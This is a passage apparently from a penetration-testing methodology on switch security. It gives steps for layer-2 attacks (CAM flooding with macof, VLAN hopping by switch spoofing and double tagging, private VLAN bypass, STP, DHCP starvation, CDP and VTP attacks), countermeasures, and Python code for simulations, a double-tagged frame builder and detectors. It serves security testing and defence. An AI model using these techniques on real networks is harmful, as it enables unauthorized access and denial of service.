Note: If a feature is supported, test the mentioned tasks in their respective domain, e.g. for Firewall Support, the Firewall Security Assessment document.
J.5.2 Assess Port Security
  o Test Content Addressable Memory (CAM) Security
  o Test Port broadcast-storm control
J.5.3 Assess VLAN Hopping Attacks
  o Test VLAN Hopping Attacks by switch spoofing
  o Test VLAN Hopping attacks by double encapsulation
J.5.4 Assess Private VLAN Attacks
  o Layer two proxy attacks
  o Private VLAN hopping using ICMP echo reply messages (in Cisco implementation)
J.5.5 Spanning Tree Attacks
J.5.6 DHCP "Starvation"
J.5.7 Cisco Discovery Protocol (CDP) Attacks
J.5.8 VTP Attacks
J.5.9 Vulnerabilities identification and target penetration
J.6 ASSESS GENERAL SWITCH SECURITY
Description
[Text]
Objective
[Text]
Expected Results
[Text]
Pre-requisites
[Text]
Process (Steps to complete this Process/Task/Test Case)
J.6.1 Identify Switch's management interface IP
• Using Discovery Protocol (CDP in case of Cisco)
• Sniffing
J.6.2 Perform Banner Grabbing
J.6.3 Determine Switch Management Security
• Identify SNMP community string
• Check Telnet, HTTP, TFTP, FTP, syslog connections
  o Implement secure variant
    - Telnet – SSH
    - TFTP – SCP
• Check Out of Band Management
J.6.4 Identify Firmware and switch model
J.6.5 Identify Switch's features
(If a feature is supported, test the mentioned tasks in their respective domain)
• Routing Support
• Intrusion Detection Support
• High Availability Support
• Firewall Support
J.7 ASSESS PORT SECURITY
Description
Restrict input on an interface by limiting and identifying the MAC addresses of the hosts that are allowed to access the port. After limiting the MAC addresses to one and assigning a single MAC address, the attached host is assured the full bandwidth of the port.
A port is configured as a secure port and its security is violated:
1. If an attempt is made from any MAC address other than the MAC addresses listed in the port security address list.
2. If the maximum number of MAC addresses is reached.
3. If a host on a secure port tries to access the secure port of another host.
Objective
• To determine Content Addressable Memory (CAM) Security
• To determine broadcast-storm control capability on the switch
Expected Results
[Text]
Pre-requisites
[Text]
Process (Steps to complete this Process/Task/Test Case)
• Test Content Addressable Memory (CAM) Security
• Test Port Storm Control
J.8 TEST CONTENT ADDRESSABLE MEMORY (CAM) SECURITY
Description
Content Addressable Memory contains MAC addresses, port numbers and their associated VLAN parameters. As a switch receives a frame, it looks in the CAM table for the destination MAC address. If an entry exists for that address, the switch forwards the frame to the corresponding port; if there is no entry, the switch broadcasts the frame to every port, like a hub. If the switch gets a response, it updates the CAM table.
The Content Addressable Memory (CAM) table is of limited size. If this table is filled with bogus addresses up to its maximum limit, no new valid entries can be added and the switch will act like a hub.
Objective
• To determine MAC address restrictions on your PC initially
• To determine the MAC address maximum limit
• To determine secure port isolation
Pre-requisites
• MAC Address Spoofer
• Two PCs
• One Switch
Steps to be performed
Use macof from the Dsniff suite to overflow the CAM table:
• Macof floods the CAM table and changes the switch's functionality to that of a hub
• Traffic without a CAM entry floods the local LAN
• Traffic with a CAM entry remains the same
• After the CAM table is full in one switch, traffic can flood to other switches on the same VLAN
Examples/Results
Syntax
macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]
<Diagram>
Analysis/Conclusion/Observation
• Traffic without a CAM entry floods the local LAN
• Traffic with a CAM entry remains the same
• As the CAM table is full, traffic floods to other switches on the same VLAN
Countermeasures
• Configure all MAC addresses manually using the switchport port-security mac-address mac_address interface configuration command
• Configure a number of addresses manually and allow the rest to be configured dynamically
• Port Security limits MAC addresses to a port.
• #port secure max-mac-count n (n can be decided depending on the business requirement at the IDC)
• On detection of an invalid MAC, configure the switch to
  o block the invalid MAC
  o shut down the port (the switch can also be configured to do this)
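To make the CAM-table behaviour and the port-security countermeasure above concrete, here is an added simulation in Python (not part of the ISSAF text and not any vendor's code): a hypothetical Switch model that learns source MACs, forwards on CAM hits, floods on misses, keeps flooding once the table is full, and, with a per-port maximum configured, shuts the port on the first excess address.

```python
"""Simulated switch CAM table with and without port security (added example).

Hypothetical model, not any vendor's implementation: the switch learns the
source MAC of every ingress frame, forwards on a CAM hit, floods on a miss,
and once the fixed-size table is full can no longer learn, so traffic to any
host that was not already learned floods like a hub. Port security (the
"switchport port-security" / "max-mac-count" idea above) caps the number of
source MACs a port may present and shuts the port on violation.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple, Union

FLOOD = "FLOOD"  # marker: frame is sent out of every port except the ingress one


@dataclass
class Switch:
    cam_capacity: int                                        # finite CAM size
    cam: Dict[str, int] = field(default_factory=dict)        # MAC -> port
    max_macs: Dict[int, int] = field(default_factory=dict)   # port -> allowed MACs
    seen: Dict[int, Set[str]] = field(default_factory=dict)  # port -> MACs presented
    shutdown: Set[int] = field(default_factory=set)
    violations: List[Tuple[int, str]] = field(default_factory=list)

    def enable_port_security(self, port: int, maximum: int) -> None:
        """Equivalent of limiting a port to `maximum` secure MAC addresses."""
        self.max_macs[port] = maximum
        self.seen[port] = set()

    def _learn(self, port: int, src: str) -> bool:
        """Learn src on port; False if port security shut the port instead."""
        if port in self.max_macs and src not in self.seen[port]:
            if len(self.seen[port]) >= self.max_macs[port]:
                self.violations.append((port, src))
                self.shutdown.add(port)          # violation action: shutdown
                return False
            self.seen[port].add(src)
        if src in self.cam or len(self.cam) < self.cam_capacity:
            self.cam[src] = port                 # refresh or learn
        return True                              # table full: frame still forwarded

    def forward(self, in_port: int, src: str, dst: str) -> Optional[Union[int, str]]:
        """Return the egress port, FLOOD, or None when the frame is dropped."""
        if in_port in self.shutdown or not self._learn(in_port, src):
            return None
        out = self.cam.get(dst)
        if out is None or out == in_port:
            return FLOOD                         # unknown destination: hub-like
        return out


def _bogus_mac(i: int) -> str:
    return f"02:00:00:00:{i >> 8:02x}:{i & 0xff:02x}"


def demo_cam_overflow(capacity: int = 50, bogus: int = 200) -> Tuple[object, object, int]:
    """A and B are learned on ports 1 and 2, C never is; then a host on port 3
    presents `bogus` fabricated source MACs (what macof does).  Returns
    (where A->B goes, where A->C goes, CAM size): A->B keeps its entry, A->C floods."""
    sw = Switch(cam_capacity=capacity)
    sw.forward(1, "aa:aa:aa:aa:aa:01", "ff:ff:ff:ff:ff:ff")
    sw.forward(2, "bb:bb:bb:bb:bb:02", "ff:ff:ff:ff:ff:ff")
    for i in range(bogus):
        sw.forward(3, _bogus_mac(i), "ff:ff:ff:ff:ff:ff")
    to_b = sw.forward(1, "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02")
    to_c = sw.forward(1, "aa:aa:aa:aa:aa:01", "cc:cc:cc:cc:cc:03")
    return to_b, to_c, len(sw.cam)


def demo_port_security(capacity: int = 50, bogus: int = 200) -> Tuple[bool, int, int]:
    """Same flood, but port 3 is limited to one secure MAC: the second address
    is a violation, the port is shut and the CAM never fills.
    Returns (port 3 shut down?, CAM size, violation count)."""
    sw = Switch(cam_capacity=capacity)
    sw.enable_port_security(3, maximum=1)
    for i in range(bogus):
        sw.forward(3, _bogus_mac(i), "ff:ff:ff:ff:ff:ff")
    return 3 in sw.shutdown, len(sw.cam), len(sw.violations)


if __name__ == "__main__":
    print("CAM overflow  (A->B, A->C, CAM size):", demo_cam_overflow())
    print("port security (shut, CAM size, violations):", demo_port_security())
```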
Tool[s]
Further Reading[s]
Remarks
It is recommended to use this in a controlled environment; you can do this by adding more MAC addresses than the switch has ports. It will fill the MAC addresses required to make the switch behave like a hub.
J.9 TEST PORT BROADCAST-STORM CONTROL
Description
This test is conducted to test broadcast-storm control on the switch. The tester sends a flood to any destination to test this feature.
Objective
• To determine the switch's support for broadcast-storm control
Pre-requisites
• Packet Crafter
• PC with OS
• Switch
Steps to be performed
1. Start any packet generator
2. Send a flood at the target system
Examples/Results
Analysis/Conclusion/Observation
If your switch disconnects your port, it provides a safeguard against broadcast storms; otherwise your switch is vulnerable to broadcast storms.
Countermeasures
Tool[s]
Further Reading[s]
Remarks
J.10 ASSESS VLAN HOPPING ATTACKS
Description
In a VLAN hopping attack, the attacker sends crafted frames from a system to another system in a different VLAN. In this attack VLAN security is bypassed.
Objective
Expected Results
Pre-requisites
Process (Steps to complete this Process/Task/Test Case)
• Test VLAN Hopping Attacks by switch spoofing
• Test VLAN Hopping attacks by double encapsulation
J.11 TEST VLAN HOPPING ATTACKS BY SWITCH SPOOFING
Description
In this attack an attacker configures his system to spoof frames as a switch. He crafts frames using 802.1q/ISL or other tagging (e.g. ISL) with DTP signaling and sends them from the management VLAN to the target VLAN with the tag of the target VLAN. It is expected to see this packet in the target VLAN. If he succeeds, he will be part of all VLANs.
Objective
• To pass data into another VLAN across more than one switch by manipulating the frame tag.
Pre-requisites
• Sniffing software (which supports frame check sequence and preamble)
• Two Cisco Ethernet switches supporting 802.1q trunking (Cat 1900 switches don't support it)
• One crossover cable
• Two straight cables
• Two PCs with Windows/Unix operating system having a 10Mb Ethernet NIC
• Console cable for switch
Steps to be performed
• Capture Sample Frame
• Change 802.1q tag as per target
• Send 802.1q Frames into non-trunk ports
Step 1: Capture sample frame
• Connect two PCs in the same VLAN of one switch.
• Send an ICMP echo message from PC1 to PC2
• Capture this with Sniffer Pro on PC2
• View packets in raw hex
• Start the packet generation component of Sniffer Pro
• Enter the packet captured in step 3
• Send the entered packet from PC1 to PC2
Step 2: Insert 802.1q tag
• Shift PC2 to the trunk port (port 24) of the switch and start the sniffer software
• Ping a non-existent IP address from PC1
• Capture the ARP lookup on PC2
• Shift PC1 to a VLAN 2 port and repeat
VLAN1 and VLAN2 will have the 81 00 00 01 and 81 00 00 02 tags respectively
Step 3: 802.1q Frames into non-trunk ports
• Put PC1 on VLAN 1 of switch one
• Put PC2 on VLAN 1 of the second switch
• Connect a trunk cable between them
• Crafted packets from VLAN1, VLAN2 and VLAN3 were delivered to their destination VLAN
Step 4: VLAN Hopping
• Connect PCs in different VLANs and in different switches
• Change VLAN IDs and send to as many combinations as possible
Examples/Results
Analysis/Conclusion/Observation
In Different Switches
Source VLAN | Destination VLAN | Tag ID | Success?
1 | 2 | 2 | Yes
1 | 3 | 3 | Yes
2 | 1 | 1 | No
3 | 2 | 3 | No
3 | 1 | 1 | No

In Same Switch
Source VLAN | Destination VLAN | Tag ID | Success?
1 | 2 | 2 | No
1 | 3 | 3 | No
2 | 1 | 1 | No
3 | 2 | 3 | No
3 | 1 | 1 | No
Countermeasures
• Separate networks clearly at logical access points.
• Turn off the ports that are not used and put them in a separate VLAN; these ports shouldn't have layer 3.
• Devices on one VLAN shouldn't access devices on another VLAN unless specific mechanisms like routing or trunking exist for doing so.
• Isolate devices at different security levels on separate layer 2 devices, e.g. the same switch shouldn't be used inside and outside of a firewall.
• Use trunk port security
  o Never use a trunk port number used in any other VLAN.
  o Disable trunking on ports that do not need it.
  o Set DTP on all ports not being used for trunking.
  o Use dedicated VLAN IDs for trunk ports.
Tool[s]
Further Reading[s]
Remarks
The attack is not easy; the following things are mandatory to perform this attack:
• Access to the native VLAN
• Target machine is in a different switch
• Attacker knows the MAC address of the target machine
• Some layer 3 device for traffic from the target's VLAN back
J.12 TEST VLAN HOPPING ATTACKS BY DOUBLE ENCAPSULATION
Description
An attacker sends double-encapsulated 802.1q frames. The switch strips off one tag and delivers the frame to the destination as per the remaining tag. This attack even works if the trunk port is off.
<Diagram>
Objective
To pass data into another VLAN across more than one switch by double encapsulating the frame tag.
Pre-requisites
• Sniffing software (Ethereal is fine)
• Two Cisco Ethernet switches supporting 802.1q trunking (Cat 1900 switches don't support 802.1q tagging; they are limited to Inter Switch Link (ISL))
• One crossover cable
• Two straight cables
• Two PCs with Windows/Unix operating system having a 10Mb Ethernet NIC
• Console cable for switch
Steps to be performed
• Craft a double-encapsulated frame
• Start a sniffer at the destination end
• Send the double-encapsulated frame
• Capture the double-encapsulated frame at the destination
Examples/Results
<Screen shot of test performed>
Analysis/Conclusion/Observation
• Supports only unidirectional traffic.
• Works even if trunk ports are set to off
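The tag values and the tag-stripping behaviour described above, as an added example in Python (not part of the ISSAF text): a parser for the 802.1Q tag stack that can serve as a capture-analysis check for double-tagged frames, plus a small model of trunk ingress showing why a dedicated native VLAN that no access port uses defeats the hop. The frames are constructed test data; nothing is sent on a network.

```python
"""Decode the 802.1Q tag stack of an Ethernet frame and flag double tagging.

Added example, not from the ISSAF text. An 802.1Q tag is a 16-bit TPID
(0x8100) followed by a 16-bit TCI whose low 12 bits are the VLAN ID, so the
bytes 81 00 00 01 mean VLAN 1.  parse_tags() walks any number of stacked
tags; trunk_ingress() models the switch behaviour the attack relies on:
an outer tag equal to the trunk's native VLAN is stripped and the frame is
then switched on the tag that remains.  All frames below are constructed
test data.
"""
import struct
from typing import List, Tuple

TPIDS = {0x8100, 0x88A8}          # 802.1Q C-tag and 802.1ad S-tag


def parse_tags(frame: bytes) -> Tuple[bytes, bytes, List[int], int]:
    """Return (dst MAC, src MAC, [VLAN IDs outer..inner], payload EtherType)."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst, src, offset, vids = frame[:6], frame[6:12], 12, []
    while True:
        if offset + 2 > len(frame):
            raise ValueError("truncated frame")
        ethertype = struct.unpack("!H", frame[offset:offset + 2])[0]
        if ethertype not in TPIDS:
            return dst, src, vids, ethertype
        if offset + 4 > len(frame):
            raise ValueError("truncated 802.1Q tag")
        tci = struct.unpack("!H", frame[offset + 2:offset + 4])[0]
        vids.append(tci & 0x0FFF)   # PCP (3 bits) and DEI (1 bit) ignored here
        offset += 4


def is_double_tagged(frame: bytes) -> bool:
    """Detection check: two or more stacked tags arriving on an access or
    trunk port is the signature of the double-encapsulation attack."""
    return len(parse_tags(frame)[2]) >= 2


def trunk_ingress(frame: bytes, native_vlan: int) -> Tuple[int, bool]:
    """Return (VLAN the frame ends up in, whether an inner tag was exposed).
    Untagged frames belong to the native VLAN; an outer tag equal to the
    native VLAN is popped, and if another tag was hidden underneath it, that
    tag now decides the VLAN (the hop)."""
    _, _, vids, _ = parse_tags(frame)
    if not vids:
        return native_vlan, False
    if vids[0] == native_vlan and len(vids) > 1:
        return vids[1], True
    return vids[0], False


def build_frame(dst: bytes, src: bytes, vids: List[int],
                ethertype: int = 0x0800, payload: bytes = b"") -> bytes:
    """Assemble a frame with the given tag stack (constructed test data only)."""
    hdr = dst + src
    for vid in vids:
        hdr += struct.pack("!HH", 0x8100, vid & 0x0FFF)
    return hdr + struct.pack("!H", ethertype) + payload


if __name__ == "__main__":
    pc1, pc2 = b"\x02\x00\x00\x00\x00\x01", b"\x02\x00\x00\x00\x00\x02"
    double = build_frame(pc2, pc1, [1, 2], payload=b"\x45" + b"\x00" * 19)
    print("tags:", parse_tags(double)[2], "double tagged:", is_double_tagged(double))
    print("native VLAN 1   ->", trunk_ingress(double, native_vlan=1))
    print("native VLAN 999 ->", trunk_ingress(double, native_vlan=999))
```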
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Countermeasures
Patches Updating
Patches should be implemented as they are released, after testing. Follow the patch management process for more detail.
Safeguard Defaults
• Change the community string and treat it as a password
• Change all factory default passwords
• Identify undocumented accounts and change the default names and passwords
Unnecessary Services
• Make sure all unnecessary services are disabled.
• The management interface of the switch is not accessible from the Internet
• An access control mechanism is implemented to give access on a need-to-know basis
• Make sure insecure services are disabled
  o TFTP
  o SNMP
  o Telnet
Implement Encryption
Usually encryption is not implemented in the switch. Encryption on the wire ensures that sniffed traffic is useless.
Further Readings
• Configuring VLANs
http://www.cisco.com/en/US/products/hw/switches/ps663/products_configuration_guide_chapter09186a00800e47e1.html#1020847
J.13 ASSESS PRIVATE VLAN ATTACK
Description
Private VLANs work by isolating traffic within specific communities. It's a VLAN within a VLAN, also called protected ports. It turns a broadcast segment into non-broadcast multi-access segments. Isolated ports within a VLAN can communicate only with promiscuous ports.
A Private VLAN environment doesn't require unicast, multicast or broadcast traffic between interfaces of the switch. Traffic between interfaces of the switch is forwarded through a layer-3 device.
Objective
Expected Results
Pre-requisites
Process (Steps to complete this Process/Task/Test Case)
• Test Layer-2 Proxy Attacks
• Product-specific misconfigurations in the project
J.14 BYPASS PVLAN USING LAYER-2 PROXY ATTACKS
Description
In this attack the attacker crafts a packet and sends it to the target with his own source IP and MAC address, the destination IP of the target and the MAC address of the router (layer-3 device). The switch forwards the frame to the router's switch port. The router routes the traffic, rewrites the destination MAC address to that of the target and sends it on to the target.
This is not a vulnerability of Private VLANs; this is the way PVLANs work, but using this technique Private VLAN security is bypassed, although only unidirectional traffic is allowed.
Objective
Bypassing Private VLAN security using Layer-2 Proxy Attacks
Pre-requisites
• Two PCs with operating system
• Packet crafter (e.g. hping)
• Router and Switch
• Straight and crossover cable
• Isolated and Promiscuous ports
Steps to be performed
• Craft a customized packet using your favorite packet crafter
  o Give the source IP and MAC address of the attacker
  o Give the destination IP address of the target
  o Give the MAC address of the router (layer-3 device)
• Start a sniffer at the target
• Capture and analyze the packet at the target end
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
J.15 PRODUCT SPECIFIC MISCONFIGURATIONS
J.16 ASSESS SPANNING TREE SECURITY
J.16.1 STP root bridge impersonation
Description
An attacker broadcasts out Spanning-Tree Protocol Configuration/Topology Change Bridge Protocol Data Units (BPDUs) in an attempt to force spanning-tree recalculations. The BPDUs sent out by the network attacker's system announce that the attacking system has a lower bridge priority, and it becomes the root bridge.
Objective
Become the root of the spanning tree. As root bridge we are able to select how the traffic is redirected between the switches, and how loops are avoided.
Pre-requisites
• One PC with operating system
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Countermeasure[s]
• Don't disable spanning tree; introducing a loop would be another attack
• Implement BPDU Guard and Root Guard
• Implement BPDU Guard
  o Disables ports using portfast upon detection of a BPDU message on the port
  o Globally enabled on all ports running portfast
• Implement Root Guard
  o Disables ports that would become root due to their BPDU advertisement; configured on a per-port basis
Further Reading[s]
J.17 ASSESS DHCP STARVATION
Description
The attacker sends crafted DHCP requests over the cable without ever sending a DHCP release.
Objective
The aim of this attack is to request the full range of IP addresses available.
Pre-requisites
Access to the network and to the DHCP server (it may be the bridge or may redirect to other hosts).
Steps to be performed
Examples/Results
The expected result of this attack is the denial of legitimate DHCP requests from devices because of the absence of free IP addresses.
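The symptom described above can be spotted on the server side; here is an added detection example in Python (not part of the ISSAF text) that runs over constructed ISC dhcpd style log lines and flags an interface where an implausible number of distinct client MACs request addresses in a short window without releasing them. The window, threshold and log format are assumptions.

```python
"""Detect DHCP starvation from DHCP server logs (added example).

Not part of the ISSAF text.  It reads ISC dhcpd style syslog lines such as
"DHCPDISCOVER from 02:00:00:00:00:01 via eth0" and alerts when one interface
sees more distinct client MAC addresses within a short window than the
segment could plausibly hold: the signature of one host requesting the whole
pool under fabricated hardware addresses and never releasing.  A DHCPRELEASE
removes that client from the count.  The log lines are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Set, Tuple

# "<Mon DD HH:MM:SS> <host> dhcpd[pid]: <MSG> ... <mac> [(hostname)] via <iface>"
LINE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dhcpd(?:\[\d+\])?: "
    r"(DHCPDISCOVER|DHCPREQUEST|DHCPRELEASE) .*?"
    r"([0-9a-f]{2}(?::[0-9a-f]{2}){5})(?: \(.*?\))? via (\S+)")
LOG_YEAR = "2005"   # syslog lines carry no year; assumed for ordering only


def detect_starvation(lines: List[str], window_s: int = 60,
                      max_clients: int = 50) -> List[str]:
    """Return one alert per interface the first time more than `max_clients`
    distinct MACs sent DHCPDISCOVER/DHCPREQUEST within `window_s` seconds."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    alerts: List[str] = []
    alerted: Set[str] = set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{m.group(1)} {LOG_YEAR}", "%b %d %H:%M:%S %Y")
        msg, mac, iface = m.group(2), m.group(3), m.group(4)
        q = recent[iface]
        if msg == "DHCPRELEASE":
            # the client gave its lease back; forget its pending requests
            recent[iface] = deque((t, x) for t, x in q if x != mac)
            continue
        q.append((ts, mac))
        while q and (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()              # slide the window
        distinct = {x for _, x in q}
        if len(distinct) > max_clients and iface not in alerted:
            alerted.add(iface)
            alerts.append(f"{iface}: {len(distinct)} distinct DHCP clients in "
                          f"{window_s}s (last {mac}); possible starvation")
    return alerts


def sample_log(n_bogus: int = 60) -> List[str]:
    """Constructed log: two ordinary clients on eth0, then a burst of
    fabricated source MACs on eth1 inside one minute."""
    fmt = "Mar 7 10:{:02d}:{:02d} dhcpsrv dhcpd[1234]: {}"
    lines = [fmt.format(0, 1, "DHCPDISCOVER from 02:00:00:00:00:01 via eth0"),
             fmt.format(0, 2, "DHCPREQUEST for 192.0.2.11 from 02:00:00:00:00:02 via eth0")]
    for i in range(n_bogus):
        lines.append(fmt.format(1, i % 60,
                                f"DHCPDISCOVER from 02:0b:0b:0b:{i >> 8:02x}:{i & 0xff:02x} via eth1"))
    return lines


if __name__ == "__main__":
    for alert in detect_starvation(sample_log()):
        print(alert)
```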
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
J.18 ASSESS CISCO DISCOVERY PROTOCOL ATTACKS
Description
CDP is a layer 2 protocol used by Cisco routers to discover each other on the same link (segment). This protocol is not routed and therefore this tool is only useful in the local segment. CDP messages contain information about the sending Cisco router. These include the device ID (hostname), port ID (which port was the sender), the platform running on, the software including version, what the box is capable of and which network address (IP address) the interface has. If not configured otherwise, Cisco routers send these messages out every 30 seconds. In our case (Ethernet), they are sent to a special MAC address (01:00:0C:CC:CC:CC) and therefore are received by every Cisco router in the same segment. Other routers store the data and hold it for a time defined in the message (the tool uses the maximum of 255 seconds). Very interesting is that Cisco IOS uses the device ID as the key to find out if the received message is an update and the neighbors are already known or not. If the device ID is too long, this test seems to fail and you constantly fill up the router's memory.
Objective
Pre-requisites
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
• CDP was found to be implemented on the core router.
• An attacker can flood the router memory completely with bogus CDP messages.
• CDP packets can be spoofed for social engineering and/or just to confuse the administrator
• Cisco router information (device ID (hostname), port ID, platform running on, software version and IP address) can be seen in clear text
Countermeasures
• Disable CDP if not required
  o no cdp run: disables CDP globally
  o no cdp enable: disables CDP on an interface (interface command)
• Highly recommended to disable at Border Routers/Switches etc.
Tool[s]
Further Reading[s]
Remarks
J.19 ASSESS ARP ATTACKS
Description
Gratuitous ARP is used by hosts to announce their IP address. It's a broadcast packet like an ARP request.
ARP cache poisoning attacks involve using a known MAC and IP address of a host on a remote VLAN to get the switch to forward packets.
Objective
Pre-requisites
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
The testing team's machine MAC addresses were not asked for when access points were provided for them. We presume that the same may be the case for servers and gateway devices.
Countermeasures
• Private VLANs provide protection against ARP attacks.
• Consider static ARP for critical static routers and hosts
• Cisco is developing an ARP firewall
• Consider implementing registration of MAC addresses for customers, suppliers and vendors
• ARPWatch is a freely available tool
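An added example (not part of the ISSAF text) of the ARPWatch idea listed above, written in Python: an ARP parser and a small monitor that keeps IP-to-MAC bindings, honours static entries for critical hosts, and alerts on a binding change, including one announced by gratuitous ARP. The monitor, its alert format and the frames it is fed are assumptions constructed here.

```python
"""arpwatch-style monitor for ARP cache poisoning (added example).

Not part of the ISSAF text.  It parses ARP packets out of raw Ethernet frames
(EtherType 0x0806, Ethernet/IPv4 hardware and protocol types), keeps an
IP-to-MAC table, and raises an alert when an IP that is already known, or
that is pinned by a static entry ("static ARP for critical routers and
hosts"), is claimed by a different MAC, including via gratuitous ARP.  The
frames used below are constructed test data in the documentation ranges.
"""
import struct
from typing import Dict, List, Optional, Tuple

ETH_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def _ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_arp(frame: bytes) -> Optional[Tuple[int, str, str, str, str]]:
    """Return (opcode, sender MAC, sender IP, target MAC, target IP), or None
    for anything that is not an Ethernet/IPv4 ARP packet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    return op, _mac(sha), _ip(spa), _mac(tha), _ip(tpa)


class ArpMonitor:
    def __init__(self, static: Optional[Dict[str, str]] = None):
        self.table: Dict[str, str] = dict(static or {})   # ip -> mac
        self.static = set(self.table)                       # pinned bindings
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> Optional[str]:
        """Feed one frame; return an alert string if the binding is suspicious."""
        pkt = parse_arp(frame)
        if pkt is None:
            return None
        op, sha, spa, _, tpa = pkt
        kind = "reply" if op == ARP_REPLY else "request"
        if spa == tpa:               # sender announces itself: gratuitous ARP
            kind = "gratuitous " + kind
        alert = self._check(spa, sha, kind)
        if alert:
            self.alerts.append(alert)
        return alert

    def _check(self, ip: str, mac: str, kind: str) -> Optional[str]:
        old = self.table.get(ip)
        if old is None:
            self.table[ip] = mac     # first sighting: learn it
            return None
        if old == mac:
            return None
        if ip in self.static:        # never overwrite a pinned entry
            return f"{kind}: {ip} claimed by {mac}, static binding is {old}"
        self.table[ip] = mac         # arpwatch calls this a flip-flop
        return f"{kind}: {ip} changed from {old} to {mac}"


def build_arp(op: int, sender_mac: str, sender_ip: str, target_mac: str,
              target_ip: str, eth_dst: str = "ff:ff:ff:ff:ff:ff") -> bytes:
    """Constructed test frames only."""
    def mac_b(m: str) -> bytes:
        return bytes.fromhex(m.replace(":", ""))

    def ip_b(a: str) -> bytes:
        return bytes(int(x) for x in a.split("."))

    eth = mac_b(eth_dst) + mac_b(sender_mac) + struct.pack("!H", ETH_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_b(sender_mac) + ip_b(sender_ip) + mac_b(target_mac) + ip_b(target_ip)
    return eth + arp


if __name__ == "__main__":
    mon = ArpMonitor(static={"192.0.2.1": "00:00:5e:00:53:01"})   # gateway pinned
    mon.observe(build_arp(ARP_REPLY, "00:00:5e:00:53:0a", "192.0.2.10",
                          "00:00:5e:00:53:01", "192.0.2.1"))
    mon.observe(build_arp(ARP_REPLY, "00:00:5e:00:53:66", "192.0.2.1",
                          "ff:ff:ff:ff:ff:ff", "192.0.2.1"))           # gateway claimed
    mon.observe(build_arp(ARP_REPLY, "00:00:5e:00:53:0b", "192.0.2.10",
                          "00:00:5e:00:53:01", "192.0.2.1"))           # host flip-flop
    print("\n".join(mon.alerts))
```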
Tool[s]
Further Reading[s]
Remarks
J.20 ASSESS VTP ATTACKS
Description
The VLAN Trunking Protocol (VTP) is used to distribute Vlan configuration among
switches. This protocol allows you to maintain a set of Vlans in a multi-switch
environment without the need of manually keep all the configurations actualized.
This protocol is only sent over trunking ports, and with Mac destination 01:00:0c:cc:cc:cc
Objective
Alter the VLAN configuration in all the switches of a trunking domain
Expected Results
Full control of the VLAN configurations in a switch environment
Pre-requisites
Access to the switch in a port with Trunking enabled.
Several switches with VTP configured
Process (Steps to complete this Process/Task/Test Case)
1.
2.
J.21 VLAN RECONFIGURATION
Description
The VTP protocol is used to update the VLAN configuration in a switch environment, so you can update it to your wishes by crafting the appropriate packet.
Objective
Reconfiguration of the VLAN environment to gain access to certain elements
Pre-requisites
Access to the switch in a port with Trunking enabled.
Several switches with VTP configured
Steps to be performed
Develop and craft the packet with the VLAN configuration through the trunking port of the switch.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Disable VTP if not needed.
If needed, set an MD5 password, as the protocol supports that kind of authentication of the VTP messages.
Tool[s]
Further Reading[s]
Remarks
J.22 LAYER 2 PORT AUTHENTICATION
Description
Layer 2 authentication can allow VLAN access based on MAC address or RADIUS authentication.
Objective
Denial of service test (prevention of validation) or unauthorized access to other VLANs.
Expected Results
Successful validation in the switch or denial of service, based on impersonation of the validation server.
Pre-requisites
PC with operating system and NIC
Process (Steps to complete this Process/Task/Test Case)
• 802.1x/EAP Switch Authentication
• 802.1X Port Authentication
J.22.1 802.1x/EAP Switch Authentication
Description
Objective
Pre-requisites
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
J.22.2 802.1X Port Authentication
Description
Objective
Pre-requisites
Steps to be performed
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
J.23 MULTICAST BRUTE FORCE FAILOVER ANALYSIS
Description
Send random multicast frames to a switch interface, attempting to get frames to another VLAN.
Objective
Find whether multicast domains can go through the switch to another VLAN.
Pre-requisites
2 PCs with operating system and NIC, connected to different VLANs
Steps to be performed
• Craft a customized packet using your favorite packet crafter
  o Give a real source
  o Give random destinations in the multicast reserved space
• Start a sniffer at the second PC to view if any traffic goes through
• Review switch console and error logs
Examples/Results
Analysis/Conclusion/Observation
If any multicast packet reaches the second PC, then this multicast domain is allowed to go through and thus can be used to attack machines in other VLANs.
Countermeasures
Tool[s]
Further Reading[s]
Remarks
J.24 RANDOM FRAME STRESS ATTACK
Description
In this attack, the intruder sends completely random packets in which only the source and destination are correct.
Objective
It is a kind of “brute force” test of the robustness of the switch logic: whether we are able to see errors, packets that do VLAN hopping, switch reboots, etc.
Pre-requisites
• Two PCs with operating system
• Packet crafter (e.g. Hping)
• Switch
• Straight and cross-over cable
• Isolated and promiscuous ports
Steps to be performed
• Craft a customized packet using your favorite packet crafter
  o Give real source and destinations
  o Give the MAC address of the router (layer-3 device)
• Start a sniffer at the second PC to view if any traffic goes through
• Review switch console and error logs
Examples/Results
Analysis/Conclusion/Observation
